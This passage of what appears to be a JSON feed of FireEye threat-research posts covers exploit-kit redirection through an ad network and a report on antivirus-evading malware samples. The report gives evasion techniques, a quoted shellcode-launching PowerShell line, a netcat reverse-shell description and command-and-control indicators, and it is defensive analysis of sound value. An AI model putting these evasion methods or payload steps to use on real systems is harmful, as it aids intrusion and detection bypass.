network was recently used in a similar campaign involving the Angler Exploit Kit, and \u2013 as seen in Figure 3 \u2013 we have still observed redirections to fake Flash media players.\n\n\n\nFigure 3. Some referer URLs redirected to fake media players when visited\n\nAs mentioned before, those who are redirected to the Rig Exploit Kit landing page could be compromised via exploits targeting Adobe Flash, Internet Explorer, Java and Microsoft Silverlight.\n\nExamples of Rig Exploit Kit landing page URLs we logged can be seen in Figure 4. These all had an onclickads[.]net URL (similar to Figure 1) in the referer field.\n\n\n\nFigure 4. Rig Exploit Kit URLs\n\nAs shown in Figure 5, the Rig Exploit Kit obfuscates its landing pages to make analysis and detection tougher. The landing page contains code that checks for the presence of antivirus or virtual environments \u2013 if either is detected by the exploit kit, the exploit will not be served.\n\n\n\nFigure 5. Obfuscated Rig Exploit Kit landing page\n\nThe samples we analyzed used an exploit for CVE-2015-5119, the Adobe Flash use-after-free vulnerability revealed in the Hacking Team leak. As mentioned [here](<http://malware.dontneedcoffee.com/2015/07/hackingteam-flash-0d-cve-2015-xxxx-and.html>), CVE-2015-5119 was integrated into Rig Exploit Kit in July. After the landing page loads, the Flash exploit is downloaded, as seen in Figure 6.\n\n\n\nFigure 6. Flash exploit being downloaded\n\nAfter successful exploitation, the payload downloads malware to the system.\n\nAs of Nov. 13, 2015, the exploit kit is redirecting to Magnitude EK URLs. Some example Magnitude EK URLs look like this: \n \n6d3bd.439.74331q.436161bv.0ecu.u677n.2401q.p44m.l0sm6dacs2.eventsam.pw/?2d5f484b42434e41444e464c495e03434859 \nmebf65l.c06a2r.ldfbk.zd899fu.w54358p.hf47613b.u90.y99xvzga7k95.satshares.pw/?225047444d4c414e4b41494346510c4c4756 \nl9077e2v.he02528l.obdb52x.34aa9.z144.8d3d49.j0i.w687g98o.hairunits.pw/?2b594e4d444548474248404a4f5805454e5f \n \n\n", "edition": 2, "cvss3": {}, "published": "2015-11-13T13:32:25", "type": "fireeye", "title": "Top-ranked Advertising Network Leads to Exploit Kit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119"], "modified": "2015-11-13T13:32:25", "id": "FIREEYE:C1FB4B9FAC84D1B9FD74A7D5A588D1D2", "href": "https://www.fireeye.com/blog/threat-research/2015/11/top-ranked_advertisi.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:47", "description": "We would like to introduce the first of our \u201cGhosts in the Endpoint\u201d series, a report prepared by FireEye Labs that documents malicious software not being detected in the wild by traditional signature-based detections.\n\nIn this study, all the families identified are samples from VirusTotal (VT) with zero detections, but detected as malicious by our Multi-Vector Virtual Execution (MVX) Engine. We also added a few samples with very low detection rates (VT &lt;=3) but with interesting bypass techniques.\n\nOur goal is to share indicators that help the AV community and others improve their detection coverage.\n\n##### **Scope**\n\n * So far, only samples found in VT with the following file types were included in this study:\n * Win32 binaries\n * Office documents (including Open XML format)\n * RTF documents\n * Hangul Word Processor (HWP)[1] documents\n\nThe study includes samples submitted to VT in 2015 that were still found undetected or with minimal detection rates as of January 2016 (see VT detection Tables in the Appendix). \n\n##### **Findings**\n\nThe following samples were identified in our research:\n\n**Suspected APT malware:**\n\n 1. **GOODTIMES backdoor**: Suspected APT; MS Office with Embedded Hacking Team Flash Exploit\n 2. **UPS backdoor: **Suspected APT3\n 3. **VBA Macro + Metasploit Shellcode Loader:** Suspected Middle Eastern-based APT\n 4. **Hancom Office HWP Exploit:** Possible APT targeting of South Korea.\n\n**Malware without attribution:**\n\n 1. **OccultAgent**: (New) Code hidden in Excel spreadsheet\n 2. **Spy-Net RAT**: Targeting Brazilian victims\n 3. **VBA Macros + PowerShell scripts:** Netcat Backdoor\n 4. **VBA Macros + Python scripts:** Metasploit Shellcode Loader\n 5. **Office Downloader**\n\n##### **Detailed Sample Analysis**\n\nMalware that remains undetected by more than 56 different AV vendors over a long period of time is worth investigating. This section briefly describes the malware and techniques identified in the undetected samples. A full list of indicators can be found in the IOC section at the end.\n\n**1\\. 4b3858c8b35e964a5eb0e291ff69ced6** \\- 201507.xlsx\n\nType: XLSX \nDescription: CVE-2015-5119 (Flash exploit exposed in the Hacking Team leak) \nAttribution: Suspected APT threat group targeting Taiwan \nCurrent detection: 0/53 \nFirst Submission: July 13, 2015 \nLast Submission: January 27, 2016 \nTime undetected in VT: At least 6 months \n\n\nThis Excel document is PKZIP compressed (following the Open XML Format) with the structure shown in Figure 1:\n\n\n\nFigure 1: Structure of XLSX document\n\nWhen the spreadsheet is opened, a dialog prompts the victim to allow unknown embedded content to be played, as shown in Figure 2. In this case, social engineering is needed to convince the victim to execute the malicious Flash object.\n\n\n\nFigure 2: Excel document content and prompt\n\nWhen the victim allows the embedded content to be played, the activeX1.xml file is read to locate the OLE Control to be used (which corresponds to Macromedia Flash Player, as shown in Figure 3) through the ClassID attribute to finally load the Flash Exploit embedded in the activeX1.bin object.\n\n\n\nFigure 3: Content of activeX1.xml file\n\nThe embedded Flash exploit corresponds to CVE-2015-5119, one of several zero-day exploits identified following the Hacking Team leak in July 2015.[2]\n\nA look at the Flash Action Script (AS) reveals code similar to that from the Hacking Team Exploit, such as the class name exp1_fla/MainTimeLine, the function name TryExpl() with the same use-after-free technique, and even the same error message \u201ccan\u2019t cause UaF\u201d as shown in Figure 4.\n\n\n\nFigure 4: Flash exploit code\n\nThe combination of the class name exp1_fla() and classes ShellMac64, ShellWin32 and ShellWin64 built into the exploit (see Figure 5) were not observed in the original Hacking Team version of the exploit, suggesting that the group responsible for this malicious Excel file modified the original exploit code.\n\n\n\nFigure 5: Flash Action Script classes from malicious Excel file\n\nThe exploit drops a variant of the backdoor we call GOODTIMES (also known as Linopid). The backdoor communicates to Taiwan-based IP addresses 220.128.223.75 and 220.134.47.67 on ports 8080 and 443 via HTTP.\n\nWhile this particular GOODTIMES sample has not been attributed to a specific threat group, GOODTIMES has previously been used by suspected APT actors. Based on previously identified targets and the use of Traditional Chinese language and Taiwan-centric themes in spear phishing messages and decoy documents, the group appears to focus on Taiwanese targets.\n\n##### **Potential AV bypassing reason**\n\n1\\. New delivery mechanism: The leaked CVE-2015-5119 Flash exploit has been used by a wide range of threat groups, including other APT groups such as APT3 and APT18[3]. Previous delivery methods entailed luring the victim to click on a malicious link (delivered via a spear phishing message) where the malicious Flash exploit was hosted on a web page. In this case, the suspected APT group responsible for the GOODTIMES backdoor changed the **delivery mechanism** by embedding the exploit as ActiveX object inside the Excel Open XML Format (PKZIP compressed).\n\n2\\. In addition, while an ActiveX object would normally be embedded inside a Compound File Binary Format[4], in this case the uncompressed Flash content is embedded directly in the Excel file, right after the ClassID, as shown at Figure 6.\n\n\n\nFigure 6: Embedded Flash object\n\n\u00b7 The above steps might be enough to avoid proper parsing of the malicious Flash object. This is the first time we have seen a CVE-2015-5119 sample embedded in an Excel document this way.\n\n**2\\. 22da029dd4e018b7c7135a03d0ba9b99**\n\nType: Win32 binary \nDescription: A variant of the UPS backdoor \nAttribution: suspected APT3 \nCurrent detection: 0/57 \nFirst Submission: August 6, 2015 \nLast Submission: February 2, 2016 \nTime undetected in VT: At least 6 months\n\nUPS is a backdoor capable of uploading and downloading files, creating a reverse shell, reconfiguring itself to use different command and control (CnC) servers, and acting as a proxy server. It uses a custom binary protocol to communicate with its CnC server and it encrypts this custom protocol using a TLS TCP connection.\n\nWhile this particular UPS sample has not been attributed, UPS is commonly used by the China-based APT3.\n\n**Potential AV bypassing reason**\n\n1\\. Junk code insertion: Examining this UPS sample, we see a significant amount of \u201cjunk code\u201d potentially designed to mask the malicious nature of the binary, as well as to complicate analysis or reverse engineering efforts.\n\nIn Figure 7 we see the backdoor executing a jump to address 0x4043AB by forcing the \u201cjump if greater than\u201d comparison to be true by moving a large value (0x4A2E88E4) to the ebx register and then comparing it with a hardcoded lower value (0x6A1E839), after which a large number of junk instructions are skipped (red square). This strategy can be seen through several different execution paths.\n\n\n\nFigure 7: Decompiled UPS sample showing junk code\n\n**3\\. aedd5d8446cc12ddfdc426cca3ed8bf0 - **S-old.xlsb****\n\nType: XLSB \nDescription: VBA Macro + Metasploit Shellcode Loader Backdoor \nAttribution: Suspected Middle Eastern-based APT \nCurrent detection: 1/52 \nFirst Submission: September 28, 2015 \nLast Submission: January 28, 2016 \nTime undetected in VT: At least 4 months\n\nThis particular sample, an Excel Binary Workbook file,[5] has only one generic detection on VT, so we believe it is still worth mentioning in this report.\n\nWhen the spreadsheet is opened, the victim is shown a table of Israeli holidays and prompted to enable macros to view the full list, as shown in Figure 8:\n\n\n\nFigure 8: Malicious Excel file showing calendar data\n\nWhen the macro is executed it creates a Windows binary in memory as shown in Figure 9. Note the Chr(77) + Chr(90) builds the MS-DOS header magic number \u201cMZ\u201d.\n\n\n\nFigure 9: Macro concatenating bytes to form a Windows binary\n\nThe binary is written to the file system with the file name NTUSER.dat{**GUID**}.exe as shown in Figure 10.\n\n\n\nFigure 10: Creating the Windows binary\n\nIn this case, the GUID selected corresponds to Scriptlet.TypeLib ActiveX object, creating the file name NTUSER.dat{FB9D87AE-8FEA-4583-98AB-2FB396EAB5FC}.exe (md5 6aab47b18afacbfa7423f09bd1fa6d25) that is later executed via the ShellExecute() API with the SW_HIDE parameter to run silently.\n\nFinally, the executable comes with an embedded Metasploit Shellcode loader that connects to 84.11.146.62 on port TCP 13661.\n\nWhile this sample has not been attributed, similar techniques (use of XLSB files with embedded, obfuscated macros; creation of the file name NTUSER.dat{GUID}.exe; use of the binary to download additional malware) and the same CnC IP address have been referenced in reporting on a suspected Middle Eastern-based APT group known as \u201cRocket Kitten\u201d, primarily targeting Middle Eastern and European organizations.\n\n**_Potential AV bypassing reason_**\n\n1\\. The byte concatenation inside the VBA Macro, used to build a Win32 binary at runtime, helps to bypass signature-based detection.\n\n**4\\. 4e51143b01e99afc3bd908794d81d3cb** \nType: HWP \nDescription: Hancom Office HWP Exploit \nAttribution: None \nCurrent detection: 3/53 \nFirst Submission: July 31, 2015 \nLast Submission: February 2, 2016 \nTime undetected in VT: At least 6 months with 3 generic detections\n\nThis sample, a Hangul Word Processor (HWP) document, has only three generic detections on VT, so we found it to be worth analyzing for this report.\n\nWhen opened, the HWP document displays Korean text and some photographs, as shown in Figure 11. Behind the scenes the document will exploit vulnerable versions of Hancom Office, dropping and executing a malicious file.\n\n\n\nFigure 11: Content of malicious HWP document\n\nInternally, the document structure includes three sections, where section 0 will trigger a Type Confusion vulnerability while parsing the content of the paragraph located at the data record structure HWPTAG_PARA_TEXT starting at offset 0x1C (see uncompressed section 0 at Figure 12). The logic bug will cause the string starting at offset 0x50 to be treated as a control structure. This control structure contains a fake object at offset 0x56 pointing to an address (0x0e0a0e0a) filled by a heap spray that eventually will redirect the execution flow to the shellcode.\n\n\n\nFigure 12: Section0 malformed paragraph\n\nA similar type confusion vulnerability has been previously documented by Ahnlab,[6] however, the vulnerability trigger is different.\n\nSection 2 has an uncompressed size equal to 112MB, used to perform the heap spray and expecting to place the shellcode at a memory address close to 0x0e040e04. In Figure 13, the beginning of the shellcode can be seen (uncompressed).\n\n\n\nFigure 13: Start of shellcode\n\nThe shellcode drops a file on disk and executes it via HncBLXX.HncShellExecute-&gt; SHELL32.ShellExecute. This generates a connection to a compromised Korean automotive website and attempts to retrieve a file with a .JPG extension, which we suspect may be a second-stage binary. However, the file was no longer available on the website at the time of our analysis.\n\nThis particular sample has not been attributed to any threat group. However, the use of malicious HWP documents is notable, as that format is specific to a regional word processing program used heavily in South Korea and in particular by the South Korean government. While the use of malicious HWP files could simply indicate regional targeting by unspecified threat actors, similar exploits have been used in the past by suspected APT groups.\n\n**Potential AV bypassing reason**\n\n1\\. Heap Spray technique change: Similar exploits used to be created with multiple large-size sections in order to spray the heap. This exploit fulfills the same purpose but with only one large-size section.\n\n2\\. Vulnerability triggered in a different format: A similar type confusion vulnerability described in this section was seen implemented in the Open XML Format (HWPX extension)[7], but this time ported to the Compound File Binary Format (HWP extension).\n\n**5\\. 497eddab53c07f4be1dc4a8c169261a5** \\- Barclays_Q22015_IMS_excel_tables.xlsm\n\nType: XLSM \nDescription: **VBA Macro + VBScript generated from spreadsheet** \nAttribution: None \nCurrent detection: 1/54 \nFirst Submission: Julio 08, 2015 \nLast Submission: January 27, 2016 \nTime undetected in VT: At least 7 months\n\nThis sample, an Excel macro-enabled file, has only one generic detection. The embedded macro creates an encoded Visual Basic (VBE) file that connects to a CnC site and allows remote control of the victim\u2019s computer. As we had not previously observed this backdoor, we named it OccultAgent.\n\nWhen the XLSM file is opened, the user is prompted to enable macros, as shown in Figure 14. The instructions are displayed in both English and Greek:\n\n\n\nFigure 14: Prompt to enable macros\n\nThe macro drops an encoded VBScript file named ocagent.vbe (69df0c3bab5e681c2e5eb5951a64776e), obtained from the data in a spreadsheet cell (see Figure 15), to C:\\octemp001\\ and executes it. The script connects to hxxp://0x5E469BFD, which is equivalent to hxxp://94.70.155.253, via the victim\u2019s web browser.\n\n\n\nFigure 15: Obfuscated script embedded in spreadsheet cell\n\nThe first stage Macro source code can be seen in Figure 16.\n\nFigure 16: Embedded VBA macro\n\nThe dropped ocagent.vbe VBScript is essentially a backdoor that connects to the CnC server at 94.70.155.253 to register the victim\u2019s computer and to obtain commands to run on the victim\u2019s machine.\n\n**Potential AV bypassing reason**\n\nThe following steps may be sufficient to bypass AV detection:\n\n1\\. Adding encoded VB script into a spreadsheet cell allows attackers to hide the malicious code.\n\n2\\. Representing the IP address in hexadecimal format may be sufficient to bypass regular expressions trying to match standard 32-bit IP addresses (dotted decimal notation).\n\n**6\\. dc15336e7e4579c9c04c6e4e1f11d3dd - **dedinho no cuzinho.rtf\n\nType: RTF \nDescription: RTF file with embedded executable \nAttribution: None \nCurrent detection: 0/54 \nFirst Submission: October 22, 2015 \nLast Submission: January 15, 2016 \nTime undetected in VT: At least 3 months\n\nIn this attack scenario, the victim receives an RTF document that appears to contain an embedded JPG image. The embedded file is actually an executable that attempts to hide its file extension by using a long sequence of underscore characters (e.g., Copy of foto.jpg&lt;underscores&gt;.exe (see Figure 17).\n\nFigure 17: RTF document with embedded file\n\nThe embedded binary (d409dc7e1ca0c86cb71e090591f16146) is packed with RLPack[8]. It drops a second Borland Delphi binary packed with a customized version of UPX, which will then drop the Spy-Net RAT on the system.\n\nSpy-Net[9] allows an attacker to interact with the victim via a remote shell to upload/download files, interact with the registry, run processes and services, capture images of the desktop, and record from the webcam and microphone. It also contains functionality to extract saved passwords and turn the victim into a proxy server. \n\nA beacon to dennyhacker[.]no-ip.org on TCP port 81 prepended with an ASCII representation of the length of the payload (33) and followed by a pipe and a new line character confirms Spy-Net activity:\n\n00000000 33 33 7c 0a 33|.\n\nThe RAT commands are translated to Portuguese to adapt the attack to Brazilian victims; some command examples are shown below (additional commands are listed in the Appendix):\n\nConfiguracoesdoserver = Server settings \nListarjanelas = List windows \nFinalizarconexao = End connection \nListarchaves = List keys\n\n**Potential AV bypassing reason**\n\n1\\. Packers are commonly used to obfuscate code in order to bypass traditional signature-based detection. The use of multiple files packed with two different packers may be sufficient to bypass detection.\n\n**7\\. b1f43ca11dcf9e60f230b9d6d332c479** \u2013 Book2 - Copy.xls\n\nType: XLSX \nDescription: VBA + Python Shellcode loader \nAttribution: None \nCurrent detection: 0/54 \nFirst Submission: September 20, 2015 \nLast Submission: January 28, 2016 \nTime undetected in VT: At least 6 months\n\nWhen opened, this Excel document appears to be blank but contains the VBA macro shown in Figure 18.\n\n\n\nFigure 18: VBA Macro with OLE Object\n\nThe macro will instantiate an OLE Object and load it via the xlVerbPrimary verb. The embedded OLE object contains two files:\n\n * python27.dll (md5 7e6dd0d7cb29103df4a592e364680075) - a legitimate file\n * file.exe (md5 73f16dbf535042bc40e9c663fe01c720) - a binary created with py2exe[10]\n\nOnce file.exe is executed it launches a copy of the Windows calculator (calc.exe) as a decoy. However, behind the scenes it performs a Metasploit reverse TCP Connect to a CnC server.\n\nThe unpacked version of file.exe is obfuscated python that can be seen in Figure 19.\n\n\n\nFigure 19: Python Shellcode\n\nThe following steps describe the process in greater detail:\n\n * File.exe spawns a copy of calc.exe.\n * Base64-decode and AES-decrypt embedded shellcode.\n * Via Python ctypes, the environment is set to run the shellcode loader in memory.\n * The shellcode loader, which has been encoded with the Metasploit Shikata encoder, [11] is configured to connect to the host 31.168.144.18 on port 443.\n * The malware sleeps for 60 seconds and starts again.\n\n**Potential AV bypassing reason** \n\n\nMultiple tricks to evade detection can be seen here:\n\n 1. The file extension of the document is .xls. However, the file is actually an Open XML Format file (.xlsx). This simple trick may bypass extension-based parsers.\n 2. The Embedded OLE object contains a legitimate binary (python27.dll) and a py2exe executable may appear to be a legitimate file.\n 3. The malicious python script is packed using py2exe.\n 4. The Embedded OLE object is extracted from a hidden Sheet3, so the VBA Macro may not appear malicious.\n 5. The shellcode is Base64 encoded and AES encrypted.\n\n**8\\. 95e89fd65a63e8442dcf06d4e768e8f1 **\\- Doc1.docm\n\nType: DOCM \nDescription: VBA + PowerShell + Netcat as Backdoor \nAttribution: None \nCurrent detection: 0/53 \nFirst Submission: June 19, 2015 \nLast Submission: January 26, 2016 \nTime undetected in VT: At least 7 months\n\nThe word document comes with a simple message shown in Figure 20.\n\n\n\nFigure 20: Message distractor\n\nWhen the VBA macro is executed (see Figure 21), PowerShell code is loaded from the document\u2019s comments (see Figure 22):\n\n\n\nFigure 21: Loading malicious code\n\n\n\nFigure 22: Code embedded in the document comments\n\nThe PowerShell script will act as a backdoor to allow remote access to the compromised machine. The script will download and execute netcat to listen on IP 192.168.52.129 and port 3724. Once a connection is received, a PowerShell shell will be sent (via \u2013e powershell.exe option) to the client (PowerShell Reverse shell) as shown in Figure 23.\n\n\n\nFigure 23: Malicious code content\n\nIt is interesting to note that attackers are moving from traditional command prompt shells (cmd.exe) to PowerShell shells (powershell.exe), which are actually more powerful. For example, PowerShell allows the use of WMI (Windows Management Instrumentation), something not readily accessible via the standard command prompt[12].\n\nThe script references a non-routable (RFC1918) IP address, so we suspect that the script was either a proof of concept or meant to be used during the lateral movement phase in a specific internal environment that uses this IP space.\n\n**Potential AV bypassing reason**\n\n1\\. Use of the .docm extension may evade extension-based parsers.\n\n2\\. Embedding the PowerShell script in the document\u2019s comments and executing it from a VB macro adds another layer of complexity. While this is clearly a suspicious behavior, it is not properly identified by signature-based detection.\n\nWe identified several other examples of malware using VBA Macros with PowerShell to mainly run shellcode loaders that allow attackers to gain remote access to victims\u2019 machines. Another example is shown below; it has two VT detections, but serves as an example of a very common variant seen in the wild.\n\n**9\\. 8de1ebacb72f3b23a8235cc66a6b6f68** \u2013 Polnoe_raspisanie_igr.xlsm\n\nType: XLSM \nDescription: VBA Macro + PowerShell \u2013 Shellcode Loader \nAttribution: None \nCurrent detection: 2/54 \nFirst Submission: October 14, 2015 \nLast Submission: January 28, 2016 \nTime undetected: 3.5 months with two generic detections\n\nWhen the Excel document is opened, a message is displayed in Russian. The user is even provided with a link to a legitimate article describing how to enable macros (see Figure 24).\n\nFigure 24: Excel file with legitimate link\n\nWhen the VBA Macro runs, it executes a PowerShell script that Base64-decodes and decompresses a second-stage PowerShell Script that will be used as the shellcode loader in memory (see Figure 25).\n\nFigure 25: PowerShell script being built on the fly via VB script\n\nPowerShell uses the Invoke-Expression (or IEX) call to execute the decompressed string, similar to the eval() functionality from other programming languages.\n\nThe Shellcode in this case comes hardcoded in the second stage PowerShell script, loaded and executed from memory with the following syntax:\n\n$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000\n\nWhere $x contains the Shellcode loaded in memory that eventually will connect to the domain spl[.]noip[.]me. Based on DNSDB query, the domain **spl[.]noip[.]me **previously resolved to Russian IP 81.23.177.72.\n\nMost of the VBA Macro + PowerShell scripts we identified were created with the macro_safe.py[13] and unicorn.py[14] scripts, often used for penetration testing.\n\n**Potential AV bypassing reason**\n\n1\\. The .xlsm extension may bypass extension-based parsers\n\n2\\. Using the VBA Macro in the first stage to build the first PowerShell script via concatenation provides an easy way to bypass signature-based detection\n\n3\\. The PowerShell scripts are Base64 encoded and compressed\n\n**10\\. cda305a6a6c6ace02597881b01a116e3 - **CVE-2013-1331-doc.docx\n\nType: DOCX \nDescription: Office Downloader \nAttribution: None \nCurrent detection: 0/55 \nFirst Submission: January 12, 2015 \nLast Submission: January 16, 2016 \nTime undetected in VT: The whole year and counting!\n\nIn 2013, a stack-based buffer overflow triggered while parsing PNG images was exploited in the wild against MS Office 2003 and Office for Mac. CVE-2013-1331 was assigned to the vulnerability.\n\nThe malicious samples did not include the PNG directly embedded in the document; rather, the PNG file was loaded from the Internet by using the INCLUDEPICTURE option[15].\n\nThis new sample uses a different option from the new XML Format called \u201cRelationships\u201d in order to download a resource from the Internet, as seen at Figure 26.\n\n\n\nFigure 26: XML content loading the PNG image remotely\n\nThe same domain was used back in 2013, but now with a different download technique. Although the vulnerability has been patched by Microsoft, the aforementioned technique can be used to download any resource from the Internet.\n\n**Potential AV bypassing reason**\n\n1\\. Use of the XML \u2018Relationship\u2019 instead of the original INCLUDEPICTURE method to download resources from the Internet is a novel technique that may not be recognized.\n\n2\\. Based on the code shown above, it is clear that the intention is not to download a .gif image but a .php resource. Signature-based engines should easily detect the unusual resource name with multiple dots.\n\n##### **Conclusion**\n\nThreat actors of all types continue to improve their techniques to compromise organizations and remain undetected within an environment. Our study identified a number of techniques that successfully bypassed many AV engines:\n\n1\\. Alternate techniques to embed objects within Office documents that may not be recognized by AV engines.\n\n2\\. The use of a multi-stage infection approach in order to look unsuspicious at each stage:\n\na. A document downloading an image from the Internet that cannot be flagged as malicious at that stage \nb. A VBA Macro script loading malicious content from spreadsheet cells\n\n3\\. Multiple techniques to load malicious content from Office documents:\n\na. Embedded as ActiveX \nb. Embedded as OLE Binary \nc. Embedded in the document\u2019s comments \nd. Embedded in the spreadsheet cell\n\n4\\. Standalone packed binaries containing malicious Python scripts.\n\n5\\. Multi-layer Packing: RLPack + Custom UPX.\n\n6\\. The combination of multiple scripting languages to allow the attackers to obfuscate malicious code, such as VBA Script building malicious PowerShell scripts.\n\nIn several cases we note that the attackers are reusing known exploits (such as CVE-2015-5119 or CVE-2013-1331), but changing the delivery method; or leveraging obfuscation, encoding, encryption, or multiple layers of packing to disguise their malicious scripts or backdoors.\n\nFor proper detection, it is essential to monitor an attack through its entire life cycle \u2013 not simply when a suspicious document or file first enters a network. This approach is necessary to detect and block multi-stage infection strategies. While initial events (such as the delivery of a macro-enabled spreadsheet) may appear innocuous, eventually a later stage of the attack will trigger detection.\n\nIt is much easier to stop an attack \u2013 including a multi-stage attack \u2013 when it first occurs, to include detecting known and unknown exploits (zero days), or even threats that require user interaction such as macros inside documents.\n\nThis detection approach is the core logic behind FireEye Multi-Vector Virtual Execution (MVX) technology.\n\n##### **APPENDIX**\n\n**Indicators of Compromise - IOCs**\n\n**Network Based:**\n\n**4b3858c8b35e964a5eb0e291ff69ced6**\n\nPOST /0000/a242550.asp \nIP: 220.128.223.75 \nTCP Port: 8080 \n\n**4e51143b01e99afc3bd908794d81d3cb**\n\nGET /bbs/file/machinery/machine_body.jpg \nIP: cncauto.co.kr \nPORT: 80\n\n**8de1ebacb72f3b23a8235cc66a6b6f68**\n\nIP: spl.noip.me \nTCP Port: 80\n\n**b1f43ca11dcf9e60f230b9d6d332c479**\n\nIP: 31.168.144.18 \nTCP Port: 443\n\n**aedd5d8446cc12ddfdc426cca3ed8bf0**\n\nIP: 84.11.146.62 \nTCP Port: 13661\n\n**497eddab53c07f4be1dc4a8c169261a5**\n\nGET /ocagnt/gethooks.asp \nIP: 94.70.155.253 \nTCP Port: 80 \nGET /ocagnt/enckeys \nIP: 94.70.155.253 \nTCP Port: 80 \nGET /ocagnt/getstatus.asp \nIP: 94.70.155.253 \nTCP Port: 80\n\n**dc15336e7e4579c9c04c6e4e1f11d3dd**\n\nIP: dennyhacker.no-ip.org \nTCP Port: 81\n\n**Host-Based:**\n\ndc15336e7e4579c9c04c6e4e1f11d3dd\n\nC:\\Windows\\System32\\install\\server.exe (copy of dropped binary) d409dc7e1ca0c86cb71e090591f16146\n\n%AppData%\\Local\\Temp\\XX--XX--XX.txt\n\nMutex created: \n_x_X_PASSWORDLIST_X_x_ \nx_X_BLOCKMOUSE_X_x_ \n***MUTEX*** \n***MUTEX***_PERSIST\n\n**497eddab53c07f4be1dc4a8c169261a5**\n\nc:\\octemp001\\ \nC:\\octemp001\\enccmdresults.txt \nC:\\octemp001\\ikeycharvalue.txt \nC:\\octemp001\\enchostnameres.txt \nC:\\octemp001\\certutil.txt \nC:\\octemp001\\cert.txt \nC:\\octemp001\\commands.txt \nC:\\octemp001\\prevcommands.txt \nC:\\octemp001\\enccmdresults.txt \nC:\\octemp001\\enccmdresults2.txt \nc:\\octemp001\\key.txt\n\nFigure 27 shows the MD5s with zero detection detailed on this report.\n\n\n\nFigure 27: 2015 samples from VT with zero detections in 2016\n\nSome exceptions to this study were added for samples with low detection rates, but with only generic detection (that is, not detected as part of any specific code family), that used an interesting technique or that were suspected of being used by an APT group (see Figure 28).\n\n\n\nFigure 28: Samples with low and / or generic detection\n\n**dc15336e7e4579c9c04c6e4e1f11d3dd** \u2013 Brazilian RAT\n\nSome interesting commands from the RAT in Portuguese language:\n\n0002A3A8: pingtest \n \n--- \n \n0002A3BC: tentarnovamente \n \n0002A3E0: mouseposition \n \n0002A3F8: keyboardkey \n \n0002A40C: webcaminactive \n \n0002A424: webcamgetbuffer \n \n0002A43C: webcam \n \n0002A44C: desktop \n \n0002A45C: stopsearch \n \n0002A470: listarvalores \n \n0002A488: maininfo \n \n0002A49C: configuracoesdoserver \n \n0002A4BC: disconnect \n \n0002A4D0: uninstall \n \n0002A4E4: renameservidor \n \n0002A4FC: enviarexecnormal \n \n0002A518: enviarexechidden \n \n0002A534: executarcomandos \n \n0002A550: openweb \n \n0002A560: downexec \n \n0002A574: resumetransfer \n \n0002A58C: listardrives \n \n0002A5A4: listararquivos \n \n0002A5BC: execnormal \n \n0002A5D0: execinv \n \n0002A5E0: deletardir \n \n[1] Hangul Word Processor is a word processing application developed by South Korean software firm Hancom. \n[2] http://www.securityweek.com/zero-day-exploits-leaked-hacking-team-breach \n[3] https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html \n[4] https://msdn.microsoft.com/en-us/library/dd942138.aspx \n[5] An XLSB file is stored in binary format instead of the normal XML format, allowing the file to be read from and written to much faster. See https://technet.microsoft.com/en-us/library/dd797428.aspx \n[6] http://asec.ahnlab.com/1035 \n[7] https://www.fireeye.com/content/dam/fireeye-www/global/en/blog/threat-research/FireEye_HWP_ZeroDay.pdf \n[8] http://www.pcworld.com/product/997528/rlpack-basic-edition.html \n[9] https://www.fireeye.com/blog/threat-research/2014/07/the-little-signature-that-could-the-curious-case-of-cz-solution.html \n[10] Py2Exe is a distutils extension to create standalone windows programs from python scripts. See https://sourceforge.net/projects/py2exe/. \n[11] https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/shikata_ga_nai.rb \n[12] http://www.howtogeek.com/163127/how-powershell-differs-from-the-windows-command-prompt/ \n[13] https://github.com/khr0x40sh/MacroShop/blob/master/macro_safe.py \n[14] https://raw.githubusercontent.com/trustedsec/unicorn/master/unicorn.py \n[15] http://blogs.technet.com/b/srd/archive/2013/06/11/ms13-051-get-out-of-my-office.aspx\n", "cvss3": {}, "published": "2016-04-13T13:00:00", "type": "fireeye", "title": "Ghosts in the Endpoint", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1331", "CVE-2015-5119"], "modified": "2016-04-13T13:00:00", "id": "FIREEYE:20039B16BD5AC80305D58731B238119A", "href": "https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-03-07T16:24:18", "description": "We would like to introduce the first of our \u201cGhosts in the Endpoint\u201d series, a report prepared by FireEye Labs that documents malicious software not being detected in the wild by traditional signature-based detections.\n\nIn this study, all the families identified are samples from VirusTotal (VT) with zero detections, but detected as malicious by our Multi-Vector Virtual Execution (MVX) Engine. We also added a few samples with very low detection rates (VT &lt;=3) but with interesting bypass techniques.\n\nOur goal is to share indicators that help the AV community and others improve their detection coverage.\n\n##### **Scope**\n\n * So far, only samples found in VT with the following file types were included in this study:\n * Win32 binaries\n * Office documents (including Open XML format)\n * RTF documents\n * Hangul Word Processor (HWP)[1] documents\n\nThe study includes samples submitted to VT in 2015 that were still found undetected or with minimal detection rates as of January 2016 (see VT detection Tables in the Appendix). \n\n##### **Findings**\n\nThe following samples were identified in our research:\n\n**Suspected APT malware:**\n\n 1. **GOODTIMES backdoor**: Suspected APT; MS Office with Embedded Hacking Team Flash Exploit\n 2. 